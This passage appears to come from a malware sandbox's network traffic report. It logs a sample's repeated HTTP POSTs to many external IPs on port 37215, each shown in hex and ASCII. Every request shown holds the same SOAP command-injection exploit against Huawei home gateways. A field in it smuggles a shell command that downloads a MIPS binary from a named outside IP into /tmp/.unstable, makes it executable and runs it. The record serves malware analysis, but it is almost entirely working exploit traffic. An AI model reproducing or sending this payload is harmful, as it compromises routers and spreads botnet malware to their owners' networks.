                    Jun 1, 2024 18:15:56.520876884 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                    Jun 1, 2024 18:15:56.952162981 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                    Jun 1, 2024 18:15:57.815994978 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                    Jun 1, 2024 18:15:59.511782885 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                    Jun 1, 2024 18:16:03.031269073 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    636192.168.2.2337586197.60.54.5837215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.287888050 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    637192.168.2.233672841.121.144.22437215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.287929058 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    638192.168.2.233977241.209.117.21837215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.287981033 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                    Jun 1, 2024 18:15:56.520194054 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                    Jun 1, 2024 18:15:56.952111959 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                    Jun 1, 2024 18:15:57.815995932 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
